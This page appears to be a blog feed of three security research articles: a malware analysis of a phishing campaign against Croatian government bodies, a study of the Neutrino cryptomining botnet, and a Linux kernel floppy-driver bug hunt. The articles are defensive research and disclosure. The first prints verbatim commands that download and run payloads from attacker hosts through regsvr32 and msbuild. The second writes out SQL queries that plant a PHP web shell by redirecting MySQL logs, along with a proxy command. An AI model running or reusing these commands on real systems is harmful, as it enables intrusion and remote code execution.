Quantcast
Channel: Positive Technologies - learn and secure
Viewing all 198 articles
Browse latest View live

IronPython, darkly: how we uncovered an attack on government entities in Europe

$
0
0

Hunting for new and dangerous cyberthreats is the job of the Positive Technologies Expert Security Center (PT ESC). In early April 2019, PT ESC analysts detected a targeted attack on the Croatian government. In this article, we will outline what makes this threat so interesting: delivery chain, indicators of compromise, and use of a new post-exploitation framework that to our knowledge has not previously been used by threat actors.

Infection chain

On April 2, 2019, during regular malware monitoring, an unusual Office document caught the eye of specialists at PT ESC.
   
Figure 1. Malicious attachment (named "Package Notification")
Disguised as a package notification, the file had been created in Microsoft Excel and saved in the old .xls format on the previous day (timestamp 2019-04-01 16:28:07 (UTC)). However, the "last printed" timestamp (2018-07-25 00:12:30 (UTC)) indicates that the document had been used in 2018. More on this later.

Note that the Comments field (which can be edited from within Excel) contains Windows console commands:

cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"): objShell.Run "net use https://postahr.vip", 0, False: Wscript.Sleep 10000: objShell.Run "regsvr32 /u /n /s /i:https://postahr.vip/page/1/update.sct scrobj.dll", 0, False: Set objShell = Nothing  > C:\users\%username%\appdata\local\microsoft\silent.vbs


Figure 2. Comments field with suspicious contents
Figure 3. Contents of the Comments field, in binary form
 This command creates a Visual Basic script that, when run, performs the following actions:

  • Establishes a WebDAV network connection.
  • Downloads and runs the file for the next stage of infection, with the help of the legitimate system utility regsvr32.

When a HTTP(S) connection is established with the attacker's server, an NTLM request is sent. This request can be used to recover the NTLM hash for pass-the-hash attacks. We did not find signs of such attacks; the reasons for connecting to the network resource remain obscure.

The technique of using regsvr32 (which registers and unregisters ActiveX controls) for malicious purposes, known as Squiblydoo, is not new. Attackers use it to get around application whitelisting and evade antivirus detection.

The text of the Comments field does not do anything by itself—it has to be triggered by something. When the victim opens the Excel document, a message written in Croatian asks the victim to enable macros:
   
Figure 4. Image asking the user to enable macros
If the user clicks the "Enable Content" button, another fake message appears, containing the logo of the Croatian Post and a package notification:

Figure 5. Fake package notification
Meanwhile, the macro has run the command from the Comments field and the new script is added to the system startup items:

Figure 6. Key logic in the macro
Curiously, the new script is not run by the macro. It is possible that this is by design, with the attackers choosing to start the next stage of infection only after the system has restarted and the user has logged in. We will return to this detail in a bit.

Portions of the script have interesting "handwriting." Well-structured, indented, and neatly formatted, this code may be borrowed from third-party sources or even output from programs that automatically generate such documents.
   
Figure 7. Macro code that has likely been borrowed
Searching for keywords found in the code turns up a large number of hits. Most likely, the hackers simply found the necessary code online and tweaked it as necessary:
   
Figure 8. A similar macro on issuu.com
Figure 9. A similar macro on stackoverflow.com

Figure 10. A similar macro on dummies.com

Let's return to the next stage of infection with regsvr32. When the command runs, a JavaScript scriptlet (named update.sct) is downloaded from the attacker server. The body contains Base64-encoded binary data. Once decoded, the data is deserialized and run by means of .NET Framework.

Figure 11. update.sct scriptlet downloaded from the attacker server
Note that this code, too, was borrowed by the attackers from public sources:

Figure 12. Similar code on rastamouse.me
Figure 13. Similar code on github.com
By all appearances, the hackers did not have a deep understanding of the tools used. For example, the scriptlet calls the setversion function, which does not do anything. (The same is true for one of the example scriptlets available online.)

When unpacked and run, the downloaded object is a .NET Portable Executable (PE) file.

Figure 14. Header of the PE file
Figure 15. Reference to SharpPick in the PE file's debugging information
The path to the source code folder is still present after compilation. Because of the -master suffix, we know that the project had been previously cloned from a repository. One folder path is an artifact of SharpPick, well-known software for downloading and running PowerShell code with .NET dependencies without needing a code interpreter.

Although SharpPick is available on GitHub, it is worth checking that no major modifications have been made to it by the attackers.

Figure 16. Part of the decompiled SharpPick code
Decompiling gives us pseudocode that, when run, decodes a PowerShell script from Base64 and runs it:

Figure 17. Partially converted PowerShell script
Simplifying the code a bit, we can easily see what it does:

  • An object is created to interact with the web server with the indicated values for User-Agent, Cookie, and proxy settings.
  • The payload is downloaded from the indicated address.
  • The downloaded data is decoded with the specified RC4 key and run.

Unfortunately, the command-and-control (C2) server was no longer accessible by the time our investigation was underway. We could not uncover the data previously obtained from it. However, this time the information available online (such as in a FireEye report) makes it clear that the final link in this infection chain was Empire Backdoor, which enables remotely controlling a victim's computer and is part of the Empire Framework post-exploitation framework.
   
Figure 18. Use of a similar PowerShell script in attacks targeting a WinRAR vulnerability
Other patterns in the script are consistent with online materials on pentesting, with special attention to hiding attacker infrastructure behind proxy servers. The most likely source of information used by the attackers was a report from Payatu Technologies. It includes detailed instructions on such topics as redirection and logging, with a focus on how to do so with Empire.
   
A few hours later (2019-04-02 16:52:56 (UTC)), we discovered yet another "package notification." The document had similarities to the previous one: it was also found in Croatia, had the same name, and sported the same fake logo. But there were differences as well.
The malicious code was in the same place (the Comments field), but this time did something different:

cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"):objShell.Run "C:\windows\system32\cmd.exe /c net use \\176.105.255.59\webdav",0:Wscript.Sleep 60000: objShell.Run "%windir%\Microsoft.Net\Framework\v4.0.30319\msbuild.exe \\176.105.255.59\webdav\msbuild.xml" , 0, False: Set objShell = Nothing  > C:\users\%username%\appdata\local\microsoft\silent.vbs

  • The network connection is made via SMB.
  • Downloading and activation of the next infection stage takes place with the help of msbuild, a legitimate .NET Framework utility.

The network address used for the SMB connection, funnily enough, contains the string "webdav" (underlining the connection of this attack to the previous one). A pass-the-hash attack is still possible with this method, although there is no confirmation that one actually took place. As before, application whitelisting is bypassed by means of a legitimate utility (this time, msbuild). Before dissecting how msbuild was used, it is worth looking at the differences in the macro code between versions.

The attackers did not make major changes to the VBA code. But this time, instead of the VBS script just being loaded, it runs as soon as the document is opened. Our guess is that the attackers had simply forgotten about this the first time, realized their oversight a while later, and corrected it in the newer version.
   
Figure 19. Comparison of macro code between the older and newer versions
The next stage of infection consists of an XML document with C# code. One feature of msbuild is its ability to compile and run inline code on the fly—as can be seen from the comments, still intact at the beginning of the document.

Yet again, the code contains a Base64 buffer that will be decoded, deflated, and run. And sure enough, the attackers relied on a publicly available template, as indicated by the comments and large number of sites with similar code.

Figure 20. msbuild.xml task downloaded from the attacker server
The result will be the same as last time: a .NET PE file will be loaded into RAM and run. The debugging information contains two clues: the code was compiled in a virtual machine (possibly to complicate attribution) and a reference is found to a folder named SILENTTRINITY, which will be important for our discussion.
   
Figure 21. Reference to SILENTTRINITY in debugging information for the PE file
Hot on the trail of these two documents, we found another two with the same file format, name, and deceptive image. The documents were available in late August 2018, which confirms our hypothesis that the campaign had been going on for quite some while.

Last year, the hackers did not use the Comments field, instead repurposing legitimate utilities. The malicious component was downloaded by certutil, which is intended for managing certificates, and launched by Windows Management Instrumentation (WMI):

Figure 22. Comparison of two different 2018 macros
Unfortunately, because so much time had already passed, we were unable to reconstruct the subsequent stages of the 2018 attacks.

In one part, the only difference in VBA code in the later version was the deletion of comments explaining the purpose of each step:
   
Figure 23. Comparison of 2018 and 2019 macros

SilentTrinity framework

 Performing an online search for SILENTTRINITY, to which we found a reference in the PE file debugging information, gives a very good idea of the origin of this link in the attack chain. In October 2018, Marcello Salvati (researcher at Black Hills Information Security) uploaded the SILENTTRINITY project to GitHub. His idea was to combine flexibility with the advantages of a well-known post-exploitation PowerShell framework by writing it in Python. His IronPython project continues to be developed today.

We won't get into the workings of IronPython (you can see a detailed talk by its creator). But we will describe the basic mechanism and a few highlights of the implementation.   

Here is what happens after the PE file is run (although the intermediate link does not necessarily have to be a PE file):

  • Contact is made with the C2 server to download a ZIP archive with necessary dependencies and main Python script.
  • The archive contents are extracted, without being saved to disk.
  • Dependencies are registered for properly handling Python scripts.
  • The main Python script runs and waits for a task from the attacker.
  • Each task is sent as a ready-to-run Python script.
  • The task is run on the victim's system in a separate thread.
  • The result is sent back to the C2 server.

Figure 24. How SilentTrinity works (source: github.com/byt3bl33d3r/SILENTTRINITY) 
A few facts of note about the implementation:

  • IronPython support includes the Boo language (a strongly typed subset of IronPython).
  • The attack is fileless and does not require disk space: dependencies, scripts, and tasks all reside in RAM.
  • All C2 traffic is encrypted with AES, including the archive with dependencies, tasks, and command output.
  • The public key is generated using the Diffie–Hellman protocol.
  • Network transport takes place over HTTP(S) with proxy support.

Figure 25. User interface on the server side of SilentTrinity

On the day of the attacks, the PE loader was uploaded to VirusTotal. None of the antivirus engines on the site classified the loader as malware. This is not surprising for a few reasons: the binary file is not saved to disk and a signature detect would not make a difference. Plus, in any case, static detection is far from the only way to protect users.
   
Figure 26. Cloud scan of the SilentTrinity loader on the day of the attacks
A few days after the attack, detection verdicts started to pop up. But at the time of the attacks, the threat was unknown or (at any rate) antivirus engines did not have the relevant signatures.

Figure 27. Current cloud scan result for the SilentTrinity loader
This is the likely reason why the attackers chose this method. We are not aware of any previous cases in which SilentTrinity had been used for malicious ends.

Attacker infrastructure

The network infrastructure used by the hackers correlates chronologically with the attacks.
 
Table 1. Domains used as attacker servers
The domain names were chosen to resemble those of legitimate sites. Such names would presumably arouse less suspicion among phishing targets. Not all the impersonated domains related to Croatia.
All attacker domains were registered with WhoisGuard privacy protection. Ordinarily used to protect domain owners from spam by hiding personal information, this feature helped the attackers to remain anonymous.

Servers for distributing and managing the malware were rented from Breezle, a Dutch provider.
The available data on hosts, addresses, and domains used—as well as the high number of connections between them—suggests a large-scale malicious effort in this case. The campaign may have included other similar tools and additional, currently unknown cases of infection.
   
Figure 28. Graph of the attacker infrastructure

Conclusion

The day after detection of the malicious documents, a press release was issued in which the Croatian Information Systems Security Bureau raised the alarm about targeted phishing attacks. Traces were discovered on multiple Croatian government systems. According to the press release, the victims received emails with links to a phishing site. There they were prompted to download a malicious document, which was the jumping-off point of our analysis.

Our investigation fills in the gaps in the attack chain. We would like to conclude by recommending protection methods to mitigate the risk of such threats:


  • Monitoring of use of certain whitelisted applications (certutil, regsvr32, msbuild, net, wmic).
  • Scanning and analysis of email attachments as well as links.
  • Periodic scanning of RAM of networked computers.


Author: Aleksey Vishnyakov, Positive Technologies

P.S. The author has presented on the topic at Positive Hack Days 9. For video of this and other talks from PHDays, see PHDays broadcast.

Indicators of compromise

0adb7204ce6bde667c5abd31e4dea164
13db33c83ee680e0a3b454228462e73f
78184cd55d192cdf6272527c62d2ff89
79e72899af1e50c18189340e4a1e46e0
831b08d0c650c8ae9ab8b4a10a199192
92530d1b546ddf2f0966bbe10771521f
c84b7c871bfcd346b3246364140cd60f
hxxps://postahr.vip/page/1/update.sct
hxxps://posteitaliane.live/owa/mail/archive.srf
hxxps://konzum.win/bat3.txt
hxxp://198.46.182.158/bat3.txt
hxxps://176.105.255.59:8089
[\\]176.105.255.59\webdav\msbuild.xml
postahr.online
176.105.254.52
93.170.105.32


Finding Neutrino

$
0
0
In August 2018, PT Network Attack Discovery and our honeypots began to record mass scans of phpMyAdmin systems. Scans were accompanied by bruteforcing of 159 various web shells with the command die(md5(Ch3ck1ng)). This information became the starting point of our investigation. Step by step, we have uncovered the whole chain of events and ultimately discovered a large malware campaign ongoing since 2013. Here we will give the details and the whole story, from start to finish.

We got scanned!

Infected bots from all over the world were randomly scanning IP addresses on the Internet. In doing so, they scanned PT NAD networks and diverse honeypots.

Request as viewed in the PT NAD interface
Scanning happened as follows:


  • First, the bot bruteforced the path to phpMyAdmin by moving down a list. 
  • Once it found phpMyAdmin, the bot started bruteforcing the password for the root account. The dictionary contained about 500 passwords, the first guess of the attackers being "root" (the default password). 
  • Next, after the password was successfully bruteforced, nothing happened. The bot did not exploit vulnerabilities and did not execute code in any other way.
  • In addition to phpMyAdmin, the bot bruteforced paths to web shells, also by moving down a list, and tried executing simple PHP commands. The dictionary contained 159 shell names, and this was the stage that left us wondering the most.

Request to the web shell with a command. If the response contains a correct MD5 value, the server is infected.
Such scans were noted and described many times in summer 2018 by other researchers (isc.sans.edu/diary/rss/23860). But nobody tried to discover their source and purpose.

To get the answers, we prepared honeypots posing as vulnerable servers. They were phpMyAdmin installations with root:root credentials and web shells responding with the correct MD5 hash. For instance, in the previous screenshot, this was a hash value of 6c87b559084c419dfe0a7c8e688a4239.

After a while, our honeypots brought their first results.

The payload

The honeypot with web shell started to receive commands containing a payload. This payload, for instance, instructed to save a new shell named images.php and execute commands in it:


After we decoded the base64 commands, it became clear that the first two requests find out the computer's configuration, and the third request executes a PowerShell script to download external components. Base64 commands are transmitted in the "code" parameter. For authorization it uses the SHA1 hash from MD5 parameter "a". For the string "just for fun" the hash will be 49843c6580a0abc8aa4576e6d14afe3d94e3222f; only the last two bytes are checked.

In most cases, the external component is a Monero cryptocurrency miner. In Windows it gets installed in the %TEMP% folder under the name lsass.exe. The miner version may vary. Some versions function without arguments and have a hard-coded wallet address. Most likely, this was done to reduce the risk of detection.

The second potential component is a PowerShell script with DLL library inside. It is downloaded from the server by another PowerShell script. The library code is executed in memory, so it is not stored on disk. The DLL library is responsible for spreading the malware and adding to the botnet.

A similar case, Ghostminer, was already described by researchers from Minerva Labs in March 2018 (bit.ly/2XwjSxO). But it derives from Neutrino, which dates back to 2013. Neutrino is also known as Kasidet. It was previously distributed via emails and various exploit kits. Its functionality changed, but the protocol for communicating with the command and control server and other artifacts remain unchanged. For instance, the string "just for fun" was used for authentication in samples as old as January 2017. Nine reports on Neutrino from 2014 can be found in Malpedia (bit.ly/2VrRJpG). The details of the last report from Minerva Labs enabled us to spot changes in the ways this malware is distributed.

Neutrino

The second component is the one that interests us, because it searches for new hosts to infect.

How Neutrino searches for new servers

After a server is infected, the first thing Neutrino does is change such TCP stack parameters as MaxUserPort and TcpFinWait2Delay. This is done to set up the infected host for the fastest scanning possible.

Code for changing TCP stack parameters 

Next it contacts the command and control (C2) server, which oversees scanning on the infected computer. The C2 server sends a command to check random Internet servers for one of several vulnerabilities. The list of checks in the Neutrino version from October 2018 was rather wide-ranging:


  • Search for XAMPP servers with WebDAV
  • Search for phpMyAdmin servers potentially vulnerable to CVE-2010-3055 (an error in the setup.php configuration script)
  • Search for Cacti's Network Weathermap plug-ins vulnerable to CVE-2013-2618
  • Search for Oracle WebLogic vulnerable to CVE-2017-10271
  • Search for Oracle WebLogic vulnerable to CVE-2018-2628
  • Search for IIS 6.0 servers vulnerable to remote code execution via the HTTP PROPFIND method (CVE-2017-7269)
  • Search for and exploitation of the infamous hole in Apache Struts2
  • Search for exposed Ethereum nodes: in June 2018, attackers were able to steal $20 million in this way
  • Bruteforcing the "sa" account in Microsoft SQL: after successful bruteforcing, Neutrino tries to execute code via xp_cmdshell
  • Search for phpMyAdmin installations without credentials
  • Bruteforcing phpMyAdmin installations with credentials
  • Extensive logic for searching for listed PHP web shells

Modules that appeared after the Minerva Labs report are shown in green. The last item on this list, the search for web shells, is the one responsible for the scans that caused us to start our investigation. The list included 159 addresses with unique parameters. For example:


  • wuwu11.php:h
  • weixiao.php:weixiao
  • qwq.php:c

Code responsible for web shell scanning
The preceding screenshot illustrates the relevant Neutrino code.

In addition to scanning for vulnerabilities, Neutrino can execute arbitrary commands and take screenshots. In the version from December 2018, the authors added three more modules:


  • Search for exposed Hadoop servers
  • Bruteforcing credentials for TomCat servers
  • Search for JSP shells from a list


We have seen the names of these JSP shells before in the JexBoss (github.com/joaomatosf/jexboss) and JBoss worm (bit.ly/2UeM9H9).

While studying this botnet, we have seen it change behavior several times. The first scans in summer contained the "Ch3ck1ng" check, but then moved on to "F3bru4ry" in february. These strings are stored inside the Neutrino module in static form. This indicates an update to Neutrino. For instance, the C2 address changed or a new module was added.

C2 communication

Data exchange between the Neutrino bot and C2 server is encoded in base64. The Cookie and Referer headers are always the same, and serve for authorization.


Exchange of commands between Neutrino bot and C2 server
In the very beginning, the bot checks the C2 connection with a simple pair of messages: Enter–Success. Next it checks in by sending brief information on the system. This request is shown in the previous screenshot. The request provides data on RAM, CPU, and username. The serial number of the volume containing the system partition is used as a unique host-specific ID. The C2 server responds with a new task for the host. This could be a search for new vulnerable hosts or execution of commands. For instance, the PMAFind command (in the screenshot) initiates a search for servers containing phpMyAdmin, Hadoop, Tomcat, listed shells, and WebDAV.

If Neutrino finds a vulnerable server, by bruteforcing the password for phpMyAdmin, for example, it informs the C2 server. Data is exchanged with base64 encoding. For example:
PMAFind&XXXXXXXX&TaskId&[Crack:PMA] root/root&http://11.22.33.44/phpmyadmin/index.php

Miner

Unlike the Neutrino module, the miner is stored on the disk and starts automatically. This is controlled by a service named "Remote Procedure Call (RPC) Remote" or the WindowsUpdate task, which run the PowerShell code. This code is stored in the EnCommand field of the WMI space root\cimv2:PowerShell_Command. The executable file of the miner itself occupies the nearby EnMiner field. For operation, Neutrino and the miner write to certain fields of the same space, such as process ID (PID) and version number.

The script from the EnCommand field launches EnMiner in several steps.


  1. The KillFake function kills processes that imitate standard ones. One such process could be explorer.exe, if it is run from a place other than %WINDIR%. The function then deletes them from disk.
  2. KillService stops and removes services whose names match the preset mask.
  3. Killer removes services, tasks, and processes by a list of names or by launch arguments.
  4. The Scanner function checks the content of each launched process and deletes any that contain strings typical of cryptocurrency miners.
  5. The lsass.exe miner is saved in the %TEMP% folder and launched.

To generalize, the KillFake, KillService, Killer, and Scanner functions are responsible for getting rid of Neutrino's competitors. They will be described later on in this article. An example of the EnCommand script is available at pastebin.com/bvkUU56w.

Addresses of XMR wallets vary from sample to sample. On average, each address got 10–40 XMR. The first transactions started in December 2017. But some hosts were taken over by other malware. For instance, the address 41xDYg86Zug9dwbJ3ysuyWMF7R6Un2Ko84TNfiCW7xghhbKZV6jh8Q7hJoncnLayLVDwpzbPQPi62bvPqe6jJouHAsGNkg2 received 1 XMR a day starting February 2018, for a total of 346 XMR. The same address is mentioned in a June 2018 report from Palo Alto Networks ("The Rise of Cryptocurrency Miners"). The report describes the surge of malicious cryptocurrency mining. As of June 2018, such miners' estimated haul was $175 million, or five percent of total Monero coins in circulation.

My php, your admin

Because the Neutrino bot itself does not exploit vulnerabilities, but only collects a list of servers, the infection mechanism remained unclear. Our bait consisting of a phpMyAdmin server with default account shed some light on the matter. We watched in real time as our server was attacked and got infected.

phpMyAdmin infection process

Infection took place in several stages:

1. First was login to phpMyAdmin. The credentials had been guessed earlier during scanning.

2. Some reconnaissance. The attacker requests phpinfo scripts at different paths.

3. The phpMyAdmin interface allows making SQL queries to a database. The attacker sends the following queries:

a. select '' into outfile ''
b. SELECT "" INTO OUTFILE "/home/wwwroot/default/images.php"

The content of "select" is then saved to disk. The following queries serve in case of an error:

SET GLOBAL general_log = 'OFF'
SET GLOBAL general_log_file = '/home/wwwroot/default/images.php'
SET GLOBAL general_log = 'ON'
SELECT ""
SET GLOBAL general_log = 'OFF'
SET GLOBAL general_log_file = 'MySQL.log'

4. And finally, some queries that we are familiar with already:

POST /images.php “a=just+for+fun&code=ZGllKCJIZWxsbywgUGVwcGEhIik7”

An automatic script was written to hack phpMyAdmin. It tries using one of two mechanisms:


  • SELECT INTO OUTFILE writes the content of the query to disk.
  • The log file is piped to a PHP script with the help of MySQL variables.


The first method is well known, and it usually fails, because of the --secure-file-priv option. But we had not seen the second method before. Usually MySQL does not allow piping a log file outside of the @@datadir variable, but this was possible in an installation from the phpStudy package. This second method was what made Neutrino "popular" on phpMyAdmin servers. The web shell content will be different for the two infection methods.

This is what the web shell response looks like when created by the second method (piping of MySQL log):



To our delight, the log contains actual dates. They can be found in responses from some images.php shells, which allowed us to determine the actual time they were implanted. This is important, because the sent commands sometimes include the following:

time = @strtotime("2015-07-16 17:32:32");
@touch($_SERVER["SCRIPT_FILENAME"],$time,$time);

Where $_SERVER[SCRIPT_FILENAME] contains "images.php". This command changes the date of the most recent modification of the file to July 16, 2015. Likely this is a (futile) attempt to complicate analysis of the Neutrino campaign Based on the content of some shells, it is possible to determine the dates of shell creation.

The second malware campaign

Surprisingly, we captured a record of images.php but also wuwu11.php, which had the body . Infection occurred with a similar mechanism. However, there were some interesting differences:


  • SQL queries were not sent all at once, but one at a time.
  • The content of the web shells is completely different; wuwu11.php does not require authorization.
  • The payload is different, too. Those who wrote wuwu11 and others implanted Trojan.Downloader to chain-download malware, but not the miner.


The difference in infection methods and shell bruteforcing in Neutrino itself indicate the existence of two simultaneous malware campaigns. Neutrino is mining cryptocurrency, while the second campaign downloads malware.

We analyzed the dates when shells were created on the infected hosts, thanks to which we determined with certainty which came first. The first shells with the self-explanatory name "test.php" date back to 2013, while "db__.init", "db_session.init", and "db.init" started showing up in 2014. Neutrino started infecting phpMyAdmin servers in January 2018 by means of vulnerabilities or competitor shells. The peak of Neutrino activity was in summer 2018. The following graph demonstrates the creation dates of Neutrino shells and of the competitor.


Botnet structure

As we learned, the Neutrino botnet has a clear division of labor among infected hosts. Some mine cryptocurrency and scan the Internet, while others act as proxy servers. The Gost utility on port 1443 is used for proxying. The shell on such hosts is named image.php (with no "s" at the end).

svchost.eXe 1388 SYSTEM C:\Windows\System\svchost.exe  -L=https://GoST:GoST@:1443

Such proxy hosts are few. They are used to implant images.php on vulnerable servers found previously, as well as to send out commands, primarily for removing competitors from hosts and launching cryptominers. Commands are sent at a rate of up to1,000 unique IPs per hour.

In most cases, connections to proxy port 1443 originate from subnets of ChinaNet Henan Province Network (1.192.0.0/13, 171.8.0.0/13 123.101.0.0/16, 123.52.0.0/14, and others).

Now that we know the structure of the malware campaigns, we can scan the Internet for their shells and estimate the size of the botnet.

Scanning the Internet

As mentioned already, the images.php web shell is implanted in the root WWW directory. Its presence and the HTTP response are clear indicators of infection. To estimate the size of the botnet, we need to send a query to images.php on all web servers on the Internet. A list of servers with port 80 is readily available at scans.io. (Censys scans the Internet and updates the list weekly.) It contains 65 million web servers, and we sent the query "GET /images.php" to each. We got a positive response from about 5,000 servers, which is only a portion of the botnet. Our honeypots were regularly scanned from new, previously unidentified IP addresses.

Botnet composition

So what, and who, are all these servers? Shodan can help us find the answer. More than half of the servers return Win32 or Win64 in the "Server" header.

Note the Server header: Apache on Windows.

According to Shodan, the share of Windows among Apache servers is less than four percent. So the abnormally high number of Windows systems in our results must be caused by specific software. True enough, some servers return the following start page:

phpStudy, main page
phpStudy is an integrated learning environment popular not only in China. In a single click it installs the Apache web server, MySQL database, PHP interpreter, and phpMyAdmin panel. It also has several configurations for Windows and Linux. The latest version of phpStudy 2017 from the official site is still vulnerable to log file piping. You can verify this for yourself.

The vulnerability in phpStudy is not the only major source of bots. The scan revealed over 20,000 servers vulnerable to CVE-2010-3055. This is also a vulnerability in phpMyAdmin, but related to the setup.php configuration script. The botnet sends them POST queries that contain malicious configurations. Next, in terms of bot sources, come servers with Cacti's Network Weathermap (CVE-2013-2618) and XAMPP with exposed WebDAV.

Hackers found a use even for phpMyAdmin panels that are patched but have weak passwords. A common technique for monetization is to export the database to an attacker-controlled hard drive, delete the database from the phpMyAdmin, and leave a ransom message:


Most likely, this has nothing to do with the Neutrino campaign.

Conclusions

In 2018, Neutrino development continued its march forward. The malware used to be distributed via email attachments and exploit kits, but in 2018 it debuted as a botnet.

Now Neutrino scans are among the top three senders of queries to our honeypots. These "leaders" are bruteforcing of admin panels, shell bruteforcing, and exploitation of vulnerabilities By scanning for over ten vulnerabilities and competitors' shells, Neutrino has assembled tens of thousands of bots. Most of those are Windows systems running phpStudy, which Neutrino uses to mine Monero. Checks for new exploits are regularly added to its code. The same day when an exploit for ThinkPHP (bit.ly/2IKAyhu), was published, we spotted a new version of Neutrino.

But the malware behaves in a careful way. First it finds vulnerable servers and then, after a while, selectively infects them with the images.php shell. It uses a number of ways to hide:


  • Executing code from memory.
  • Checking the shell in several stages before executing code.
  • Placing C2 on infected servers.


We can detect its presence based on specific network requests. At Positive Technologies, we develop detection rules for network attacks. The rules are similar to antivirus signatures, but they check network traffic. We started this article by describing how PT NAD found strange requests based on some tell-tale attributes. Specifically, these were bruteforcing of phpMyAdmin and shells. This is how the rules trigger window looks in the PT NAD interface.

Signature triggered during a scan by Neutrino bot
Even though in the example the Neutrino bot was unsuccessful, our rules will detect exploitation of any vulnerability or server infection. We have published some of our rules on GitHub (bit.ly/2IL3R3F).

To protect servers from Neutrino infection, we recommend that administrators: Check the password for the root account in phpMyAdmin. Make sure to patch services and install the latest updates. Remember, Neutrino is regularly updated with new exploits.

Author: Kirill Shipulin, PT ESС

Case study: Searching for a vulnerability pattern in the Linux kernel

$
0
0
This short article describes the investigation of one funny Linux kernel vulnerability and my experience with Semmle QL and Coccinelle, which I used to search for similar bugs.

The kernel bug

Several days ago my custom syzkaller instance got an interesting crash. It had a stable reproducer and I started the investigation. Here I will take the opportunity to say that syzkaller is an awesome project with a great impact on our industry. A tip of my hat to the people working on it!

I found out that the bug causing this crash was introduced to drivers/block/floppy.c in commit 229b53c9bf4e (June 2017).

The compat_getdrvstat() function has the following code:

static int compat_getdrvstat(int drive, bool poll,
                            struct compat_floppy_drive_struct __user *arg)
{
        struct compat_floppy_drive_struct v;

        memset(&v, 0, sizeof(struct compat_floppy_drive_struct));
...
        if (copy_from_user(arg, &v, sizeof(struct compat_floppy_drive_struct)))
                return -EFAULT;
...
}

Here copy_from_user() has the userspace pointer arg as the copy destination and the kernelspace pointer &v as the source. That is obviously a bug. It can be triggered by a user with access to the floppy drive.

The effect of this bug on x86_64 is funny. It causes memset() of the userspace memory from the kernelspace:

  1. access_ok() for the copy_from_user() source (second parameter) fails. 
  2. copy_from_user() then tries to erase the copy destination (first parameter). 
  3. But the destination is in the userspace instead of kernelspace... 
  4. …so we have a kernel crash: 

[   40.937098] BUG: unable to handle page fault for address: 0000000041414242
[   40.938714] #PF: supervisor write access in kernel mode
[   40.939951] #PF: error_code(0x0002) - not-present page
[   40.941121] PGD 7963f067 P4D 7963f067 PUD 0
[   40.942107] Oops: 0002 [#1] SMP NOPTI
[   40.942968] CPU: 0 PID: 292 Comm: d Not tainted 5.3.0-rc3+ #7
[   40.944288] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   40.946478] RIP: 0010:__memset+0x24/0x30
[   40.947394] Code: 90 90 90 90 90 90 0f 1f 44 00 00 49 89 f9 48 89 d1 83 e2 07 48 c1 e9 03 40 0f b6 f6 48 b8 01 01 01 01 01 01 01 01 48 0f af c6 48 ab 89 d1 f3 aa 4c 89 c8 c3 90 49 89 f9 40 88 f0 48 89 d1 f3
[   40.951721] RSP: 0018:ffffc900003dbd58 EFLAGS: 00010206
[   40.952941] RAX: 0000000000000000 RBX: 0000000000000034 RCX: 0000000000000006
[   40.954592] RDX: 0000000000000004 RSI: 0000000000000000 RDI: 0000000041414242
[   40.956169] RBP: 0000000041414242 R08: ffffffff8200bd80 R09: 0000000041414242
[   40.957753] R10: 0000000000121806 R11: ffff88807da28ab0 R12: ffffc900003dbd7c
[   40.959407] R13: 0000000000000001 R14: 0000000041414242 R15: 0000000041414242
[   40.961062] FS:  00007f91115c4440(0000) GS:ffff88807da00000(0000) knlGS:0000000000000000
[   40.962603] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   40.963695] CR2: 0000000041414242 CR3: 000000007c584000 CR4: 00000000000006f0
[   40.965004] Call Trace:
[   40.965459]  _copy_from_user+0x51/0x60
[   40.966141]  compat_getdrvstat+0x124/0x170
[   40.966781]  fd_compat_ioctl+0x69c/0x6d0
[   40.967423]  ? selinux_file_ioctl+0x16f/0x210
[   40.968117]  compat_blkdev_ioctl+0x21d/0x8f0
[   40.968864]  __x32_compat_sys_ioctl+0x99/0x250
[   40.969659]  do_syscall_64+0x4a/0x110
[   40.970337]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

I haven't found a way to exploit it for privilege escalation.

Kudos to my friends for their advice and jokes—we had a nice time playing with it!

Variant analysis: Semmle QL

My first thought was to search for similar issues throughout the entire kernel source code. I decided to try Semmle QL for that (Semmle has been very active recently). There is a nice introduction to QL and LGTM with enough information for a quick start.

So I opened the Linux kernel project in the Query console and just searched for copy_from_user() calls:

import cpp

from FunctionCall call
where call.getTarget().getName() = "copy_from_user"
select call, "I see a copy_from_user here!"

This query gave only 616 results. That's strange, since the Linux kernel has many more copy_from_user() calls than that. I found the answer in the LGTM documentation:

LGTM extracts information from each codebase and generates a database
ready for querying. For C/C++ projects, the source code is built
as part of the extraction process.

So the Linux kernel config used for kernel build is limiting the scope of LGTM analysis. If some kernel subsystem is not enabled in the config, it is not built and hence we can't analyze its code in LGTM.

The LGTM documentation also says that:
You may need to customize the process to enable LGTM to build the project.
You can do this by adding to your repository an lgtm.yml file for your project.

I decided to create a custom lgtm.yml file for the Linux kernel and asked for a default one on the LGTM community forum.

The answer from the LGTM Team was really fast and helpful:

The worker machines we use on lgtm.com are small and resource-constrained,
so unfortunately make defconfig is just about the biggest config we can use.
It takes 3.5 hours for the full build+extraction+analysis for every commit,
and we allow 4 hours at most.

That's not good, however they are currently working on a solution for big projects.
So I decided to try another tool for my investigation.

Variant analysis: Coccinelle

I had heard about Coccinelle. The Linux kernel community uses this tool a lot. Moreover, I remembered that Kees Cook searched for copy_from_user() mistakes with Coccinelle. So I started to learn the Semantic Patch Language (SmPL) and finally wrote this rule (thanks to Julia Lawall for feedback):

virtual report

@cfu exists@
identifier f;
type t;
identifier v;
position decl_p;
position copy_p;
@@

f(..., t v@decl_p, ...)
{
... when any
copy_from_user@copy_p(v, ...)
... when any
}

@script:python@
f << cfu.f;
t << cfu.t;
v << cfu.v;
decl_p << cfu.decl_p;
copy_p << cfu.copy_p;
@@

if '__user' in t:
  msg0 = "function \"" + f + "\" has arg \"" + v + "\" of type \"" + t + "\""
  coccilib.report.print_report(decl_p[0], msg0)
  msg1 = "copy_from_user uses \"" + v + "\" as the destination. What a shame!\n"
  coccilib.report.print_report(copy_p[0], msg1)

The idea behind it is simple. Usually copy_from_user() is called in functions that take a userspace pointer as a parameter. My rule describes the case when copy_from_user() takes the userspace pointer as the copy destination:

  • The main part of the rule finds all cases when a parameter v of some function f() is used as the first parameter of copy_from_user().
  • In case of a match, the Python script checks whether v has the __user annotation in its type. 

